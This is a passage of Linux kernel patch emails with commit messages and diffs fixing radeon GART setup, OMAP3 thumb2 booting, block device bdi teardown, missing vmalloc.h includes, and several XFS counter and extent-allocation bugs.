/* setup context0 */ WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_PROTECTION_FAULT_DEFAULT_ADDR, (u32)(rdev->dummy_page.addr >> 12)); diff --git a/drivers/gpu/drm/radeon/r600.c b/drivers/gpu/drm/radeon/r600.c index 25b4ac967742..8f6d862a1882 100644 --- a/drivers/gpu/drm/radeon/r600.c +++ b/drivers/gpu/drm/radeon/r600.c @@ -1112,7 +1112,7 @@ static int r600_pcie_gart_enable(struct radeon_device *rdev) WREG32(MC_VM_L1_TLB_MCB_RD_SEM_CNTL, tmp | ENABLE_SEMAPHORE_MODE); WREG32(MC_VM_L1_TLB_MCB_WR_SEM_CNTL, tmp | ENABLE_SEMAPHORE_MODE); WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_CNTL, ENABLE_CONTEXT | PAGE_TABLE_DEPTH(0) | RANGE_PROTECTION_FAULT_ENABLE_DEFAULT); diff --git a/drivers/gpu/drm/radeon/rv770.c b/drivers/gpu/drm/radeon/rv770.c index c54d6313a46d..01ee96acb398 100644 --- a/drivers/gpu/drm/radeon/rv770.c +++ b/drivers/gpu/drm/radeon/rv770.c @@ -921,7 +921,7 @@ static int rv770_pcie_gart_enable(struct radeon_device *rdev) 
WREG32(MC_VM_MB_L1_TLB2_CNTL, tmp); WREG32(MC_VM_MB_L1_TLB3_CNTL, tmp); WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_CNTL, ENABLE_CONTEXT | PAGE_TABLE_DEPTH(0) | RANGE_PROTECTION_FAULT_ENABLE_DEFAULT); diff --git a/drivers/gpu/drm/radeon/si.c b/drivers/gpu/drm/radeon/si.c index 5326f753e107..4c679b802bc8 100644 --- a/drivers/gpu/drm/radeon/si.c +++ b/drivers/gpu/drm/radeon/si.c @@ -4303,7 +4303,7 @@ static int si_pcie_gart_enable(struct radeon_device *rdev) L2_CACHE_BIGK_FRAGMENT_SIZE(4)); /* setup context0 */ WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_PROTECTION_FAULT_DEFAULT_ADDR, (u32)(rdev->dummy_page.addr >> 12)); From d8a50941c91a68da202aaa96a3dacd471ea9c693 Mon Sep 17 00:00:00 2001 From: Tony Lindgren Date: Thu, 28 May 2015 07:22:08 -0700 Subject: [PATCH 411/872] ARM: OMAP3: Fix booting with thumb2 kernel We get a NULL pointer dereference on omap3 for thumb2 compiled kernels: Internal error: Oops: 80000005 [#1] SMP THUMB2 ... [] (_raw_spin_unlock_irqrestore) from [] (omap3_enter_idle_bm+0xc5/0x178) [] (omap3_enter_idle_bm) from [] (cpuidle_enter_state+0x77/0x27c) [] (cpuidle_enter_state) from [] (cpu_startup_entry+0x155/0x23c) [] (cpu_startup_entry) from [] (start_kernel+0x32f/0x338) [] (start_kernel) from [<8000807f>] (0x8000807f) The power management related assembly on omaps needs to interact with ARM mode bootrom code, so we need to keep most of the related assembly in ARM mode. Turns out this error is because of missing ENDPROC for assembly code as suggested by Stephen Boyd . Let's fix the problem by adding ENDPROC in two places to sleep34xx.S. Let's also remove the now duplicate custom code for mode switching. This has been unnecessary since commit 6ebbf2ce437b ("ARM: convert all "mov.* pc, reg" to "bx reg" for ARMv6+"). And let's also remove the comments about local variables, they are now just confusing after the ENDPROC. The reason why ENDPROC makes a difference is it sets .type and then the compiler knows what to do with the thumb bit as explained at: https://wiki.ubuntu.com/ARM/Thumb2PortingHowto Reported-by: Kevin Hilman Tested-by: Kevin Hilman Signed-off-by: Tony Lindgren --- arch/arm/mach-omap2/sleep34xx.S | 22 ++-------------------- 1 file changed, 2 insertions(+), 20 deletions(-) diff --git a/arch/arm/mach-omap2/sleep34xx.S b/arch/arm/mach-omap2/sleep34xx.S index d1dedc8195ed..eafd120b53f1 100644 --- a/arch/arm/mach-omap2/sleep34xx.S +++ b/arch/arm/mach-omap2/sleep34xx.S @@ -203,23 +203,8 @@ save_context_wfi: */ ldr r1, kernel_flush blx r1 - /* - * The kernel doesn't interwork: v7_flush_dcache_all in particluar will - * always return in Thumb state when CONFIG_THUMB2_KERNEL is enabled. - * This sequence switches back to ARM. Note that .align may insert a - * nop: bx pc needs to be word-aligned in order to work. 
- */ - THUMB( .thumb ) - THUMB( .align ) - THUMB( bx pc ) - THUMB( nop ) - .arm - b omap3_do_wfi - -/* - * Local variables - */ +ENDPROC(omap34xx_cpu_suspend) omap3_do_wfi_sram_addr: .word omap3_do_wfi_sram kernel_flush: @@ -364,10 +349,7 @@ exit_nonoff_modes: * =================================== */ ldmfd sp!, {r4 - r11, pc} @ restore regs and return - -/* - * Local variables - */ +ENDPROC(omap3_do_wfi) sdrc_power: .word SDRC_POWER_V cm_idlest1_core: From aad653a0bc09dd4ebcb5579f9f835bbae9ef2ba3 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Tue, 19 May 2015 15:58:37 +1000 Subject: [PATCH 412/872] block: discard bdi_unregister() in favour of bdi_destroy() bdi_unregister() now contains very little functionality. It contains a "WARN_ON" if bdi->dev is NULL. This warning is of no real consequence as bdi->dev isn't needed by anything else in the function, and it triggers if blk_cleanup_queue() -> bdi_destroy() is called before bdi_unregister, which happens since Commit: 6cd18e711dd8 ("block: destroy bdi before blockdev is unregistered.") So this isn't wanted. It also calls bdi_set_min_ratio(). This needs to be called after writes through the bdi have all been flushed, and before the bdi is destroyed. Calling it early is better than calling it late as it frees up a global resource. Calling it immediately after bdi_wb_shutdown() in bdi_destroy() perfectly fits these requirements. So bdi_unregister() can be discarded with the important content moved to bdi_destroy(), as can the writeback_bdi_unregister event which is already not used. Reported-by: Mike Snitzer Cc: stable@vger.kernel.org (v4.0) Fixes: c4db59d31e39 ("fs: don't reassign dirty inodes to default_backing_dev_info") Fixes: 6cd18e711dd8 ("block: destroy bdi before blockdev is unregistered.") Acked-by: Peter Zijlstra (Intel) Acked-by: Dan Williams Tested-by: Nicholas Moulin Signed-off-by: NeilBrown Reviewed-by: Christoph Hellwig Signed-off-by: Jens Axboe --- block/genhd.c | 1 - include/linux/backing-dev.h | 1 - include/trace/events/writeback.h | 1 - mm/backing-dev.c | 18 +----------------- 4 files changed, 1 insertion(+), 20 deletions(-) diff --git a/block/genhd.c b/block/genhd.c index 0a536dc05f3b..666e11b83983 100644 --- a/block/genhd.c +++ b/block/genhd.c @@ -653,7 +653,6 @@ void del_gendisk(struct gendisk *disk) disk->flags &= ~GENHD_FL_UP; sysfs_remove_link(&disk_to_dev(disk)->kobj, "bdi"); - bdi_unregister(&disk->queue->backing_dev_info); blk_unregister_queue(disk); blk_unregister_region(disk_devt(disk), disk->minors); diff --git a/include/linux/backing-dev.h b/include/linux/backing-dev.h index aff923ae8c4b..d87d8eced064 100644 --- a/include/linux/backing-dev.h +++ b/include/linux/backing-dev.h @@ -116,7 +116,6 @@ __printf(3, 4) int bdi_register(struct backing_dev_info *bdi, struct device *parent, const char *fmt, ...); int bdi_register_dev(struct backing_dev_info *bdi, dev_t dev); -void bdi_unregister(struct backing_dev_info *bdi); int __must_check bdi_setup_and_register(struct backing_dev_info *, char *); void bdi_start_writeback(struct backing_dev_info *bdi, long nr_pages, enum wb_reason reason); diff --git a/include/trace/events/writeback.h b/include/trace/events/writeback.h index 880dd7437172..c178d13d6f4c 100644 --- a/include/trace/events/writeback.h +++ b/include/trace/events/writeback.h @@ -250,7 +250,6 @@ DEFINE_EVENT(writeback_class, name, \ DEFINE_WRITEBACK_EVENT(writeback_nowork); DEFINE_WRITEBACK_EVENT(writeback_wake_background); DEFINE_WRITEBACK_EVENT(writeback_bdi_register); 
-DEFINE_WRITEBACK_EVENT(writeback_bdi_unregister); DECLARE_EVENT_CLASS(wbc_class, TP_PROTO(struct writeback_control *wbc, struct backing_dev_info *bdi), diff --git a/mm/backing-dev.c b/mm/backing-dev.c index 6dc4580df2af..000e7b3b9896 100644 --- a/mm/backing-dev.c +++ b/mm/backing-dev.c @@ -359,23 +359,6 @@ static void bdi_wb_shutdown(struct backing_dev_info *bdi) flush_delayed_work(&bdi->wb.dwork); } -/* - * Called when the device behind @bdi has been removed or ejected. - * - * We can't really do much here except for reducing the dirty ratio at - * the moment. In the future we should be able to set a flag so that - * the filesystem can handle errors at mark_inode_dirty time instead - * of only at writeback time. - */ -void bdi_unregister(struct backing_dev_info *bdi) -{ - if (WARN_ON_ONCE(!bdi->dev)) - return; - - bdi_set_min_ratio(bdi, 0); -} -EXPORT_SYMBOL(bdi_unregister); - static void bdi_wb_init(struct bdi_writeback *wb, struct backing_dev_info *bdi) { memset(wb, 0, sizeof(*wb)); @@ -443,6 +426,7 @@ void bdi_destroy(struct backing_dev_info *bdi) int i; bdi_wb_shutdown(bdi); + bdi_set_min_ratio(bdi, 0); WARN_ON(!list_empty(&bdi->work_list)); WARN_ON(delayed_work_pending(&bdi->wb.dwork)); From 5538d294dd6661de27b567fe69b597c99cb54cdd Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Thu, 28 May 2015 11:35:41 -0700 Subject: [PATCH 413/872] treewide: Add missing vmalloc.h inclusion. All of these files were only building on non-x86 because of the indirect inclusion of vmalloc.h by, of all things, "net/inet_hashtables.h". None of this got caught during build testing, because on x86 there is an implicit vmalloc.h include via one of the arch asm/ headers. This fixes all of these. Reported-by: Stephen Rothwell Signed-off-by: David S. Miller --- drivers/scsi/qla2xxx/tcm_qla2xxx.c | 1 + drivers/target/iscsi/iscsi_target.c | 1 + drivers/target/target_core_file.c | 1 + drivers/target/target_core_pr.c | 1 + drivers/target/target_core_transport.c | 1 + drivers/target/target_core_user.c | 1 + drivers/vhost/scsi.c | 1 + 7 files changed, 7 insertions(+) diff --git a/drivers/scsi/qla2xxx/tcm_qla2xxx.c b/drivers/scsi/qla2xxx/tcm_qla2xxx.c index 68c2002e78bf..b59dee56800c 100644 --- a/drivers/scsi/qla2xxx/tcm_qla2xxx.c +++ b/drivers/scsi/qla2xxx/tcm_qla2xxx.c @@ -27,6 +27,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c index 34871a628b11..112cfcda3c3c 100644 --- a/drivers/target/iscsi/iscsi_target.c +++ b/drivers/target/iscsi/iscsi_target.c @@ -21,6 +21,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/target/target_core_file.c b/drivers/target/target_core_file.c index f7e6e51aed36..0853a060f1a4 100644 --- a/drivers/target/target_core_file.c +++ b/drivers/target/target_core_file.c @@ -30,6 +30,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/target/target_core_pr.c b/drivers/target/target_core_pr.c index c1aa9655e96e..580040d5c52b 100644 --- a/drivers/target/target_core_pr.c +++ b/drivers/target/target_core_pr.c @@ -27,6 +27,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c index 3fe5cb240b6f..ad40036a64a6 100644 --- a/drivers/target/target_core_transport.c +++ b/drivers/target/target_core_transport.c @@ -34,6 +34,7 @@ #include #include #include +#include #include #include #include diff --git
a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index dbc872a6c981..78a1d1940347 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -21,6 +21,7 @@ #include #include #include +#include #include #include #include diff --git a/drivers/vhost/scsi.c b/drivers/vhost/scsi.c index 5e19bb53b3a9..864a82ef2312 100644 --- a/drivers/vhost/scsi.c +++ b/drivers/vhost/scsi.c @@ -35,6 +35,7 @@ #include #include #include +#include #include #include #include From 74f9ce1cf2830b94e189f4e99678dbf19aa3bc90 Mon Sep 17 00:00:00 2001 From: George Wang Date: Fri, 29 May 2015 07:39:34 +1000 Subject: [PATCH 414/872] xfs: use percpu_counter_read_positive for mp->m_icount The function percpu_counter_read() just returns the current counter value, which can be negative. This can make the "allocated inode counts <= m_maxicount" check produce a false positive. Using percpu_counter_read_positive() solves this problem and is consistent with the purpose of introducing the percpu mechanism to XFS. Signed-off-by: George Wang Reviewed-by: Dave Chinner Signed-off-by: Dave Chinner --- fs/xfs/libxfs/xfs_ialloc.c | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/fs/xfs/libxfs/xfs_ialloc.c b/fs/xfs/libxfs/xfs_ialloc.c index 07349a183a11..1c9e75521250 100644 --- a/fs/xfs/libxfs/xfs_ialloc.c +++ b/fs/xfs/libxfs/xfs_ialloc.c @@ -376,7 +376,7 @@ xfs_ialloc_ag_alloc( */ newlen = args.mp->m_ialloc_inos; if (args.mp->m_maxicount && - percpu_counter_read(&args.mp->m_icount) + newlen > + percpu_counter_read_positive(&args.mp->m_icount) + newlen > args.mp->m_maxicount) return -ENOSPC; args.minlen = args.maxlen = args.mp->m_ialloc_blks; @@ -1339,10 +1339,13 @@ xfs_dialloc( * If we have already hit the ceiling of inode blocks then clear * okalloc so we scan all available agi structures for a free * inode. + * + * Read rough value of mp->m_icount by percpu_counter_read_positive, + * which will sacrifice the preciseness but improve the performance. */ if (mp->m_maxicount && - percpu_counter_read(&mp->m_icount) + mp->m_ialloc_inos > - mp->m_maxicount) { + percpu_counter_read_positive(&mp->m_icount) + mp->m_ialloc_inos + > mp->m_maxicount) { noroom = 1; okalloc = 0; } From 80188b0d77d7426b494af739ac129e0e684acb84 Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:39:34 +1000 Subject: [PATCH 415/872] percpu_counter: batch size aware __percpu_counter_compare() XFS uses non-standard batch sizes for avoiding frequent global counter updates on its allocated inode counters, as they increment or decrement in batches of 64 inodes. Hence the standard percpu counter batch of 32 means that the counter is effectively a global counter. Currently XFS uses a batch size of 128 so that it doesn't take the global lock on every single modification. However, XFS also needs to compare accurately against zero, which means we need to use percpu_counter_compare(), and that has a hard-coded batch size of 32, and hence it spuriously fails to detect when it is supposed to use precise comparisons, so the accounting goes wrong. Add __percpu_counter_compare() to take a custom batch size so we can use it sanely in XFS and factor percpu_counter_compare() to use it.
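To illustrate the intended usage, here is a minimal sketch of a hypothetical caller (MY_BATCH and example_take() are made up for the example and are not part of this patch): a subsystem that updates a counter with a custom batch pairs the update and the comparison so both use the same batch size.

#define MY_BATCH	128	/* same custom batch used for the updates */

static int example_take(struct percpu_counter *counter, s64 delta)
{
	/* fold into the global count only every MY_BATCH units */
	__percpu_counter_add(counter, -delta, MY_BATCH);

	/* Compare against zero with the same batch so the comparison
	 * knows how far the cheap approximate read can drift before it
	 * must fall back to a precise __percpu_counter_sum().
	 */
	if (__percpu_counter_compare(counter, 0, MY_BATCH) < 0) {
		percpu_counter_add(counter, delta);	/* undo, no space */
		return -ENOSPC;
	}
	return 0;
}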
Signed-off-by: Dave Chinner Acked-by: Tejun Heo Signed-off-by: Dave Chinner --- include/linux/percpu_counter.h | 13 ++++++++++++- lib/percpu_counter.c | 6 +++--- 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/include/linux/percpu_counter.h b/include/linux/percpu_counter.h index 50e50095c8d1..84a109449610 100644 --- a/include/linux/percpu_counter.h +++ b/include/linux/percpu_counter.h @@ -41,7 +41,12 @@ void percpu_counter_destroy(struct percpu_counter *fbc); void percpu_counter_set(struct percpu_counter *fbc, s64 amount); void __percpu_counter_add(struct percpu_counter *fbc, s64 amount, s32 batch); s64 __percpu_counter_sum(struct percpu_counter *fbc); -int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs); +int __percpu_counter_compare(struct percpu_counter *fbc, s64 rhs, s32 batch); + +static inline int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs) +{ + return __percpu_counter_compare(fbc, rhs, percpu_counter_batch); +} static inline void percpu_counter_add(struct percpu_counter *fbc, s64 amount) { @@ -116,6 +121,12 @@ static inline int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs) return 0; } +static inline int +__percpu_counter_compare(struct percpu_counter *fbc, s64 rhs, s32 batch) +{ + return percpu_counter_compare(fbc, rhs); +} + static inline void percpu_counter_add(struct percpu_counter *fbc, s64 amount) { diff --git a/lib/percpu_counter.c b/lib/percpu_counter.c index 48144cdae819..f051d69f0910 100644 --- a/lib/percpu_counter.c +++ b/lib/percpu_counter.c @@ -197,13 +197,13 @@ static int percpu_counter_hotcpu_callback(struct notifier_block *nb, * Compare counter against given value. * Return 1 if greater, 0 if equal and -1 if less */ -int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs) +int __percpu_counter_compare(struct percpu_counter *fbc, s64 rhs, s32 batch) { s64 count; count = percpu_counter_read(fbc); /* Check to see if rough count will be sufficient for comparison */ - if (abs(count - rhs) > (percpu_counter_batch*num_online_cpus())) { + if (abs(count - rhs) > (batch * num_online_cpus())) { if (count > rhs) return 1; else @@ -218,7 +218,7 @@ int percpu_counter_compare(struct percpu_counter *fbc, s64 rhs) else return 0; } -EXPORT_SYMBOL(percpu_counter_compare); +EXPORT_SYMBOL(__percpu_counter_compare); static int __init percpu_counter_startup(void) { From 8c1903d3081ab7c416f1bbc7905f37a265d5e2e9 Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:39:34 +1000 Subject: [PATCH 416/872] xfs: inode and free block counters need to use __percpu_counter_compare Because the counters use a custom batch size, the comparison functions need to be aware of that batch size otherwise the comparison does not work correctly. This leads to ASSERT failures on generic/027 like this: XFS: Assertion failed: 0, file: fs/xfs/xfs_mount.c, line: 1099 ------------[ cut here ]------------ .... Call Trace: [] xfs_mod_icount+0x99/0xc0 [] xfs_trans_unreserve_and_mod_sb+0x28b/0x5b0 [] xfs_log_commit_cil+0x321/0x580 [] xfs_trans_commit+0xb7/0x260 [] xfs_bmap_finish+0xcd/0x1b0 [] xfs_inactive_ifree+0x1e1/0x250 [] xfs_inactive+0x130/0x200 [] xfs_fs_evict_inode+0x91/0xf0 [] evict+0xb8/0x190 [] iput+0x18b/0x1f0 [] do_unlinkat+0x1f3/0x320 [] ? filp_close+0x5a/0x80 [] SyS_unlinkat+0x1b/0x40 [] system_call_fastpath+0x12/0x71 This is a regression introduced by commit 501ab32 ("xfs: use generic percpu counters for inode counter"). This patch fixes the same problem for both the inode counter and the free block counter in the superblocks. 
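As a rough worked illustration (assuming, say, 8 online CPUs for the arithmetic): with updates batched at 128, the approximate value returned by percpu_counter_read() can drift from the true count by up to roughly 128 * 8 = 1024, yet percpu_counter_compare() with its hard-coded batch of 32 only falls back to a precise __percpu_counter_sum() when the approximate value is within 32 * 8 = 256 of the comparison point. Outside that window it trusts an approximation that may be on the wrong side of zero, which is how the ASSERT above can fire even though the real count is fine.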
Signed-off-by: Dave Chinner Reviewed-by: Brian Foster Signed-off-by: Dave Chinner --- fs/xfs/xfs_mount.c | 34 ++++++++++++++++++++-------------- 1 file changed, 20 insertions(+), 14 deletions(-) diff --git a/fs/xfs/xfs_mount.c b/fs/xfs/xfs_mount.c index 2ce7ee3b4ec1..6f23fbdfb365 100644 --- a/fs/xfs/xfs_mount.c +++ b/fs/xfs/xfs_mount.c @@ -1084,14 +1084,18 @@ xfs_log_sbcount(xfs_mount_t *mp) return xfs_sync_sb(mp, true); } +/* + * Deltas for the inode count are +/-64, hence we use a large batch size + * of 128 so we don't need to take the counter lock on every update. + */ +#define XFS_ICOUNT_BATCH 128 int xfs_mod_icount( struct xfs_mount *mp, int64_t delta) { - /* deltas are +/-64, hence the large batch size of 128. */ - __percpu_counter_add(&mp->m_icount, delta, 128); - if (percpu_counter_compare(&mp->m_icount, 0) < 0) { + __percpu_counter_add(&mp->m_icount, delta, XFS_ICOUNT_BATCH); + if (__percpu_counter_compare(&mp->m_icount, 0, XFS_ICOUNT_BATCH) < 0) { ASSERT(0); percpu_counter_add(&mp->m_icount, -delta); return -EINVAL; @@ -1113,6 +1117,14 @@ xfs_mod_ifree( return 0; } +/* + * Deltas for the block count can vary from 1 to very large, but lock contention + * only occurs on frequent small block count updates such as in the delayed + * allocation path for buffered writes (page a time updates). Hence we set + * a large batch count (1024) to minimise global counter updates except when + * we get near to ENOSPC and we have to be very accurate with our updates. + */ +#define XFS_FDBLOCKS_BATCH 1024 int xfs_mod_fdblocks( struct xfs_mount *mp, @@ -1151,25 +1163,19 @@ xfs_mod_fdblocks( * Taking blocks away, need to be more accurate the closer we * are to zero. * - * batch size is set to a maximum of 1024 blocks - if we are - * allocating of freeing extents larger than this then we aren't - * going to be hammering the counter lock so a lock per update - * is not a problem. - * * If the counter has a value of less than 2 * max batch size, * then make everything serialise as we are real close to * ENOSPC. */ -#define __BATCH 1024 - if (percpu_counter_compare(&mp->m_fdblocks, 2 * __BATCH) < 0) + if (__percpu_counter_compare(&mp->m_fdblocks, 2 * XFS_FDBLOCKS_BATCH, + XFS_FDBLOCKS_BATCH) < 0) batch = 1; else - batch = __BATCH; -#undef __BATCH + batch = XFS_FDBLOCKS_BATCH; __percpu_counter_add(&mp->m_fdblocks, delta, batch); - if (percpu_counter_compare(&mp->m_fdblocks, - XFS_ALLOC_SET_ASIDE(mp)) >= 0) { + if (__percpu_counter_compare(&mp->m_fdblocks, XFS_ALLOC_SET_ASIDE(mp), + XFS_FDBLOCKS_BATCH) >= 0) { /* we had space! */ return 0; } From 6dea405eee9e5e73eb54a1dbcc5b65047113cd92 Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:40:06 +1000 Subject: [PATCH 417/872] xfs: extent size hints can round up extents past MAXEXTLEN This results in BMBT corruption, as seen by this test: # mkfs.xfs -f -d size=40051712b,agcount=4 /dev/vdc .... # mount /dev/vdc /mnt/scratch # xfs_io -ft -c "extsize 16m" -c "falloc 0 30g" -c "bmap -vp" /mnt/scratch/foo which results in this failure on a debug kernel: XFS: Assertion failed: (blockcount & xfs_mask64hi(64-BMBT_BLOCKCOUNT_BITLEN)) == 0, file: fs/xfs/libxfs/xfs_bmap_btree.c, line: 211 .... Call Trace: [] xfs_bmbt_set_allf+0x8f/0x100 [] xfs_bmbt_set_all+0x1d/0x20 [] xfs_iext_insert+0x9e/0x120 [] ? xfs_bmap_add_extent_hole_real+0x1c6/0xc70 [] xfs_bmap_add_extent_hole_real+0x1c6/0xc70 [] xfs_bmapi_write+0x72b/0xed0 [] ? kmem_cache_alloc+0x15c/0x170 [] xfs_alloc_file_space+0x160/0x400 [] ? down_write+0x29/0x60 [] xfs_file_fallocate+0x29b/0x310 [] ? 
__sb_start_write+0x58/0x120 [] ? do_vfs_ioctl+0x318/0x570 [] vfs_fallocate+0x140/0x260 [] SyS_fallocate+0x48/0x80 [] system_call_fastpath+0x12/0x17 The tracepoint that indicates the extent that triggered the assert failure is: xfs_iext_insert: idx 0 offset 0 block 16777224 count 2097152 flag 1 Clearly indicating that the extent length is greater than MAXEXTLEN, which is 2097151. A prior trace point shows the allocation was an exact size match and that a length greater than MAXEXTLEN was asked for: xfs_alloc_size_done: agno 1 agbno 8 minlen 2097152 maxlen 2097152 ^^^^^^^ ^^^^^^^ We don't see this problem with extent size hints through the IO path because we can't do single IOs large enough to trigger MAXEXTLEN allocation. fallocate(), OTOH, is not limited in its allocation sizes and so needs help here. The issue is that the extent size hint alignment is rounding up the extent size past MAXEXTLEN, because xfs_bmapi_write() is not taking into account extent size hints when calculating the maximum extent length to allocate. xfs_bmapi_reserve_delalloc() is already doing this, but direct extent allocation is not. Unfortunately, the calculation in xfs_bmapi_reserve_delalloc() is wrong, and it works only because delayed allocation extents are not limited in size to MAXEXTLEN in the in-core extent tree. Hence this calculation does not work for direct allocation, and the delalloc code needs fixing. This may, in fact, be the underlying bug that occasionally causes transaction overruns in delayed allocation extent conversion, so now that we know it's wrong we should fix it, too. Many thanks to Brian Foster for finding this problem during review of this patch. Hence the fix, after much code reading, is to allow xfs_bmap_extsize_align() to align partial extents when full alignment would extend the alignment past MAXEXTLEN. We can safely do this because all callers have higher layer allocation loops that already handle short allocations, and so will simply run another allocation to cover the remainder of the requested allocation range that we ignored during alignment. The advantage of this approach is that it also removes the need for callers to do anything other than limit their requests to MAXEXTLEN - they don't really need to be aware of extent size hints at all. Signed-off-by: Dave Chinner Reviewed-by: Brian Foster Signed-off-by: Dave Chinner --- fs/xfs/libxfs/xfs_bmap.c | 31 +++++++++++++++++++------------ 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/fs/xfs/libxfs/xfs_bmap.c b/fs/xfs/libxfs/xfs_bmap.c index aeffeaaac0ec..f1026e86dabc 100644 --- a/fs/xfs/libxfs/xfs_bmap.c +++ b/fs/xfs/libxfs/xfs_bmap.c @@ -3224,12 +3224,24 @@ xfs_bmap_extsize_align( align_alen += temp; align_off -= temp; } + + /* Same adjustment for the end of the requested area. */ + temp = (align_alen % extsz); + if (temp) + align_alen += extsz - temp; + /* - * Same adjustment for the end of the requested area. + * For large extent hint sizes, the aligned extent might be larger than + * MAXEXTLEN. In that case, reduce the size by an extsz so that it pulls + * the length back under MAXEXTLEN. The outer allocation loops handle + * short allocation just fine, so it is safe to do this. We only want to + * do it when we are forced to, though, because it means more allocation + * operations are required.
*/ - if ((temp = (align_alen % extsz))) { - align_alen += extsz - temp; - } + while (align_alen > MAXEXTLEN) + align_alen -= extsz; + ASSERT(align_alen <= MAXEXTLEN); + /* * If the previous block overlaps with this proposed allocation * then move the start forward without adjusting the length. @@ -3318,7 +3330,9 @@ xfs_bmap_extsize_align( return -EINVAL; } else { ASSERT(orig_off >= align_off); - ASSERT(orig_end <= align_off + align_alen); + /* see MAXEXTLEN handling above */ + ASSERT(orig_end <= align_off + align_alen || + align_alen + extsz > MAXEXTLEN); } #ifdef DEBUG @@ -4099,13 +4113,6 @@ xfs_bmapi_reserve_delalloc( /* Figure out the extent size, adjust alen */ extsz = xfs_get_extsz_hint(ip); if (extsz) { - /* - * Make sure we don't exceed a single extent length when we - * align the extent by reducing length we are going to - * allocate by the maximum amount extent size aligment may - * require. - */ - alen = XFS_FILBLKS_MIN(len, MAXEXTLEN - (2 * extsz - 1)); error = xfs_bmap_extsize_align(mp, got, prev, extsz, rt, eof, 1, 0, &aoff, &alen); ASSERT(!error); From 6dfe5a049f2d48582050339d2a6b6fda36dfd14c Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:40:08 +1000 Subject: [PATCH 418/872] xfs: xfs_attr_inactive leaves inconsistent attr fork state behind xfs_attr_inactive() is supposed to clean up the attribute fork when the inode is being freed. While it removes attribute fork extents, it completely ignores attributes in local format, which means that there can still be active attributes on the inode after xfs_attr_inactive() has run. This leads to problems with concurrent inode writeback - the in-core inode attribute fork is removed without locking on the assumption that nothing will be attempting to access the attribute fork after a call to xfs_attr_inactive() because it isn't supposed to exist on disk any more. To fix this, make xfs_attr_inactive() completely remove all traces of the attribute fork from the inode, regardless of it's state. Further, also remove the in-core attribute fork structure safely so that there is nothing further that needs to be done by callers to clean up the attribute fork. This means we can remove the in-core and on-disk attribute forks atomically. Also, on error simply remove the in-memory attribute fork. There's nothing that can be done with it once we have failed to remove the on-disk attribute fork, so we may as well just blow it away here anyway. cc: # 3.12 to 4.0 Reported-by: Waiman Long Signed-off-by: Dave Chinner Reviewed-by: Brian Foster Signed-off-by: Dave Chinner --- fs/xfs/libxfs/xfs_attr_leaf.c | 8 ++-- fs/xfs/libxfs/xfs_attr_leaf.h | 2 +- fs/xfs/xfs_attr_inactive.c | 83 +++++++++++++++++++++-------------- fs/xfs/xfs_inode.c | 12 ++--- 4 files changed, 58 insertions(+), 47 deletions(-) diff --git a/fs/xfs/libxfs/xfs_attr_leaf.c b/fs/xfs/libxfs/xfs_attr_leaf.c index 04e79d57bca6..e9d401ce93bb 100644 --- a/fs/xfs/libxfs/xfs_attr_leaf.c +++ b/fs/xfs/libxfs/xfs_attr_leaf.c @@ -574,8 +574,8 @@ xfs_attr_shortform_add(xfs_da_args_t *args, int forkoff) * After the last attribute is removed revert to original inode format, * making all literal area available to the data fork once more. 
